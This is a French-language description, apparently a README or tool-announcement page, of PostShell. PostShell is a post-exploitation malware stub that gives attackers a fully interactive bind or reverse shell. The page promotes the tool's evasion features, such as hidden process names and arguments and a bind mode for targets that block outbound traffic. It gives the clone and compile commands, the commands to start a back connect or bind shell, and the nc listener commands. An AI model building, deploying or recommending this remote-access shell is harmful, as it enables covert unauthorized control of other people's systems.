
PostShell - Shell de post-exploitation de type bind/backconnect
PostShell est un shell de post-exploitation qui inclut à la fois un shell bind et un shell de back connect. Il crée un TTY entièrement interactif permettant le contrôle des tâches. La taille du stub est d'environ 14 Ko et peut être compilé sur tout système de type Unix.
Bannière et interaction avec le shell après le démarrage d'une connexion.
PostShell permet une post-exploitation plus facile en rendant l'attaquant moins dépendant de dépendances telles que Python et Perl. Il intègre également à la fois un shell de back connect et un shell bind, ce qui signifie que si une cible n'autorise pas les connexions sortantes, un opérateur peut simplement démarrer un shell bind et se connecter à la machine à distance. PostShell est également nettement moins suspect qu'un shell traditionnel car le nom des processus et les arguments sont tous deux masqués.
git clone https://github.com/rek7/postshellcd postshell && sh compile.sh
Cela devrait créer un binaire appelé "stub" qui est le logiciel malveillant.$ ./stub
Bind Shell Usage: ./stub port
Back Connect Usage: ./stub ip port
$
Backconnect :
$ ./stub 127.0.0.1 13377
Shell Bind :
$ ./stub 13377
Réception d'un backconnect :
$ nc -vlp port
Connexion à un shell Bind :
$ nc host port